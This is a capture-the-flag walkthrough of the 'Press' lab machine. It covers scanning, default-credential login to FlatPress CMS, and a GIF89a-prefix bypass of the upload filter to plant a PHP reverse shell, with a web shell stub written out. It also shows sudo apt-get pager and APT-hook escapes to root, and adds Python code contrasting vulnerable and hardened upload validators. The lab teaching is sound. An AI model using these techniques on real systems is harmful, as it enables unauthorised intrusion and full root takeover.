PG - Press


In this walkthrough we will go through the Press room from Proving Grounds. The room is rated Intermediate on the platform. The initial foothold comes from a file upload attack against the FlatPress CMS running on port 8089, and privilege escalation abuses a sudo misconfiguration that lets the low-privileged user run the apt-get binary as root. So, let's get started without any delay.


Machine Info:

  • Title: Press
  • IP address: 192.168.169.29
  • Difficulty: Intermediate
  • OS: Linux
  • Description: Press is an Intermediate Linux machine running FlatPress CMS, which can be exploited through a file upload attack to get the initial foothold. For privilege escalation, a sudo misconfiguration for the apt-get binary is exploited.

Enumeration:

  • I started off with a regular aggressive nmap scan (-A) and found only 3 ports open: 22 (SSH), 80 (HTTP) and 8089 (HTTP). Port 53/tcp showed up as filtered. Note that 8089 reports the FlatPress generator tag and version (fp-1.2.1) straight away, which is the interesting target here.

$ sudo nmap -A 192.168.169.29
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-06 21:20 IST

Nmap scan report for 192.168.169.29
Host is up (0.21s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.4p1: 
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2021-41617	4.4	https://vulners.com/prion/PRION:CVE-2021-41617
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp   filtered domain
80/tcp   open     http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Lugx Gaming Shop HTML5 Template
| vulners: 
|   cpe:/a:apache:http_server:2.4.56: 
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	OSV:BIT-APACHE-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|     	OSV:BIT-APACHE-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|     	OSV:BIT-APACHE-2023-31122	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2023-43622	5.0	https://vulners.com/cve/CVE-2023-43622
|     	CVE-2023-31122	5.0	https://vulners.com/cve/CVE-2023-31122
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|_    	CVE-2023-45802	2.6	https://vulners.com/cve/CVE-2023-45802
8089/tcp open     http    Apache httpd 2.4.56 ((Debian))
|_http-generator: FlatPress fp-1.2.1
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: FlatPress
| vulners: 
|   cpe:/a:apache:http_server:2.4.56: 
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	OSV:BIT-APACHE-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|     	OSV:BIT-APACHE-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|     	OSV:BIT-APACHE-2023-31122	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2023-43622	5.0	https://vulners.com/cve/CVE-2023-43622
|     	CVE-2023-31122	5.0	https://vulners.com/cve/CVE-2023-31122
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|_    	CVE-2023-45802	2.6	https://vulners.com/cve/CVE-2023-45802
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/6%OT=22%CT=1%CU=37943%PV=Y%DS=4%DC=T%G=Y%TM=65C2556B
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=109%TI=Z%II=I%TS=A)SEQ(SP=FD%
OS:GCD=1%ISR=109%TI=Z%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW
OS:7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%
OS:W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1
OS:(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=B10C%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1025/tcp)
HOP RTT       ADDRESS
1   217.57 ms 192.168.45.1
2   213.49 ms 192.168.45.254
3   217.61 ms 192.168.251.1
4   217.86 ms 192.168.169.29

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.44 seconds

nmap scan

port 8089 open

  • Enumerated the web server on port 80 and found a static gaming-shop template (the "Lugx Gaming Shop HTML5 Template" that nmap reported as the page title). Looked around the different pages on the website but found nothing interesting.

Gaming website screenshots: home page, Our Shop, COD MW 2 product page, Contact Us

  • Fired gobuster at the web server on port 80 to reveal hidden directories. Nothing useful here either: only the template's own pages and asset directories came back, and /server-status is forbidden (403).

$ gobuster dir -u http://192.168.169.29/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.169.29/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html
[+] Timeout:                 10s
===============================================================
2024/02/06 21:25:51 Starting gobuster in directory enumeration mode
===============================================================
/contact.html         (Status: 200) [Size: 6903]
/assets               (Status: 301) [Size: 317] [--> http://192.168.169.29/assets/]
/shop.html            (Status: 200) [Size: 11662]                                  
/index.html           (Status: 200) [Size: 15103]                                  
/vendor               (Status: 301) [Size: 317] [--> http://192.168.169.29/vendor/]
/server-status        (Status: 403) [Size: 279]                                    
/product-details.html (Status: 200) [Size: 9655]                                   
                                                                                   
===============================================================
2024/02/06 21:39:53 Finished
===============================================================

gobuster scan

  • Next, enumerated the web server on port 8089 and found the FlatPress CMS running.

FlatPress CMS

  • Found a login panel in the right sidebar. The default username and password combination worked and got me into the backend (Administration area) of the CMS.

FlatPress CMS login panel

Administration area

Initial Access:

  • Once I landed in the Administration area, the Uploader functionality caught my attention. First I uploaded a normal text file through it; the upload succeeded and the file was reachable through the Media Manager, so uploads land in a web-accessible directory. Nice!

File Upload functionality

Uploader

Media Manager

  • But when I tried to upload a PHP reverse shell the same way, the Uploader rejected it with the error shown below.

Uploader

  • The Uploader was inspecting the content of the uploaded file (its detected MIME type) rather than trusting the extension, and discarded anything detected as PHP. This is easy to bypass: prepend the GIF magic bytes below to the payload. Content sniffing then classifies the file as image/gif, but the file keeps its .php extension, so Apache still hands it to the PHP interpreter, which echoes the bytes before the <?php tag as plain output and executes the rest.

GIF89a;

reverse shell

  • Using the above technique, I was able to bypass the filter, upload the reverse shell, and trigger it by browsing to the uploaded file with a listener waiting, which gave me a reverse connection back.

Files uploaded

got initial access
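The check that was bypassed above is worth seeing in code. The following is an added example, not code from the original write-up or from FlatPress: it models the class of upload filter that sniffs the content type from magic bytes (the way finfo/mime_content_type do) and rejects anything that looks like PHP, then contrasts it with a stricter validator. The magic-byte table, both validators and the sample payloads are this example's own simplifications and assumptions, not FlatPress code.

```python
"""
Added example: a content-sniffing upload check that the GIF89a prefix bypasses,
beside a hardened check that allow-lists the extension, requires the sniffed
type to agree with it, and picks a server-side filename.
"""
import os
import secrets

# Minimal magic-byte table standing in for libmagic (assumption: only the
# signatures needed for this demonstration).
MAGIC = [
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
]

PHP_TAGS = (b"<?php", b"<?=")


def sniff_mime(data: bytes) -> str:
    """Content-based MIME detection: magic bytes first, then a PHP-tag check."""
    for sig, mime in MAGIC:
        if data.startswith(sig):
            return mime
    if any(tag in data for tag in PHP_TAGS):
        return "text/x-php"
    return "application/octet-stream"


def vulnerable_check(filename: str, data: bytes) -> bool:
    """Rejects by sniffed content type only; the extension is never looked at,
    so a .php file that starts with GIF89a passes and Apache still runs it."""
    return sniff_mime(data) != "text/x-php"


# Extension -> the only MIME type accepted for it.
ALLOWED = {".gif": "image/gif", ".png": "image/png",
           ".jpg": "image/jpeg", ".jpeg": "image/jpeg"}


def hardened_check(filename: str, data: bytes) -> bool:
    """Allow-list the extension, require the sniffed type to match it, and
    refuse anything carrying a PHP open tag regardless of what it sniffs as."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        return False
    if sniff_mime(data) != ALLOWED[ext]:
        return False
    if any(tag in data for tag in PHP_TAGS):
        return False
    return True


def safe_storage_name(filename: str) -> str:
    """Server-chosen name: random stem plus an allow-listed extension, so the
    client controls neither the path nor a double extension like x.php.gif."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + ext


# Constructed inputs: a PHP web shell stub and the GIF89a-prefixed polyglot
# (the trick used in the write-up). The PHP body is a harmless placeholder.
PLAIN_SHELL = b"<?php system($_GET['cmd']); ?>"
POLYGLOT = b"GIF89a;\n" + PLAIN_SHELL
REAL_GIF = b"GIF89a" + b"\x00" * 16  # header plus a zeroed screen descriptor


def demo() -> dict:
    """Run both validators over the constructed inputs."""
    return {
        "plain_sniff": sniff_mime(PLAIN_SHELL),
        "polyglot_sniff": sniff_mime(POLYGLOT),
        "vuln_accepts_plain": vulnerable_check("shell.php", PLAIN_SHELL),
        "vuln_accepts_polyglot": vulnerable_check("shell.php", POLYGLOT),
        "hard_accepts_polyglot": hardened_check("shell.php", POLYGLOT),
        "hard_accepts_polyglot_gif_ext": hardened_check("shell.gif", POLYGLOT),
        "hard_accepts_real_gif": hardened_check("logo.gif", REAL_GIF),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable check accepts the polyglot because the sniffed type is image/gif; the hardened one rejects it twice over (bad extension, and a PHP tag inside an "image"). Even the hardened validator is only one layer: the upload directory should also be served without a PHP handler or kept outside the web root, so that a bypass of the validator does not become code execution.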

Privilege Escalation:

  • Ran LinPEAS on the target to enumerate potential privilege escalation vectors and found that our user can run the apt-get binary as root without a password (confirmed with sudo -l).

sudo -l

  • Next, used the GTFOBins technique for apt-get to get root and captured the root flag to mark the machine complete. It works because apt-get changelog opens the fetched changelog in a pager (less), and since the pager is running as root under sudo, its ! command spawns a root shell:

sudo GTFObins exploit

sudo apt-get changelog apt
!/bin/sh

  The second line is typed at the pager prompt, not at the shell. If fetching the changelog fails (the box needs to reach the changelog server) GTFOBins also lists a non-interactive variant that runs a shell from an apt hook: sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh. Either way, the fix is the same: never grant sudo on a package manager, since it spawns pagers, editors and hooks as root.

got root
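The sudo -l finding above is the kind of thing that is easy to miss in a long LinPEAS dump. The following is an added example, not from the original write-up, LinPEAS or GTFOBins: a small triage helper that parses sudo -l output and flags entries whose program GTFOBins lists as a sudo shell escape. The binary list is a short assumption rather than a complete GTFOBins mirror, and the sample output is constructed (the username "lowpriv" is a placeholder, not the box's real user).

```python
"""
Added example: parse `sudo -l` output and flag entries that hand over a root
shell (ALL, or a binary known from GTFOBins to escape to a shell).
"""
import re

# Assumption: a small subset of GTFOBins "sudo" entries.
RISKY_BINS = {"apt-get", "apt", "vim", "vi", "less", "more", "man", "find",
              "awk", "python", "python3", "perl", "env", "bash", "sh"}

# Matches the "(runas) [TAG: ...] command[, command ...]" lines of sudo -l.
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.*)$")


def parse_sudo_l(text: str) -> list:
    """Return (runas, tags, command) for every command the user may run."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # Defaults lines, headers, blank lines
        runas, tagstr, cmds = m.groups()
        tags = [t.rstrip(":") for t in tagstr.split()]
        for cmd in cmds.split(","):
            entries.append((runas.strip(), tags, cmd.strip()))
    return entries


def flag_risky(text: str) -> list:
    """Entries whose program is ALL or a known shell escape.
    Each result is (basename, nopasswd, full command)."""
    flagged = []
    for runas, tags, cmd in parse_sudo_l(text):
        prog = cmd.split()[0] if cmd else ""
        base = prog.rsplit("/", 1)[-1]
        if prog == "ALL" or base in RISKY_BINS:
            flagged.append((base, "NOPASSWD" in tags, cmd))
    return flagged


# Constructed sudo -l output modelled on the apt-get finding in this write-up.
SAMPLE = """\
Matching Defaults entries for lowpriv on press:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lowpriv may run the following commands on press:
    (ALL) NOPASSWD: /usr/bin/apt-get
    (root) /usr/bin/systemctl status apache2, /usr/bin/less /var/log/apache2/access.log
"""

if __name__ == "__main__":
    for base, nopasswd, cmd in flag_risky(SAMPLE):
        print(f"{base:10} {'NOPASSWD' if nopasswd else 'password'}  {cmd}")
```

On a real target pipe the live listing in (sudo -l | python3 triage.py, after replacing SAMPLE with sys.stdin.read()). The systemctl entry in the sample is not flagged, which is the point: the script narrows the list to the entries worth looking up on GTFOBins rather than replacing that lookup.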


Conclusion:


So that was "Press" for you. We started off with a regular nmap scan and found 3 ports open: 22 (SSH), 80 (HTTP) and 8089 (HTTP). Enumerating the web server on port 8089 revealed FlatPress CMS with a login panel in the right sidebar, and the default username and password combination got us into the Administration area. From there, the Uploader's content-type check was bypassed by prefixing the PHP reverse shell with the GIF89a magic bytes, which gave us the initial foothold. For privilege escalation, the sudo entry that allowed apt-get to run as root was abused through its pager to get a root shell. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".
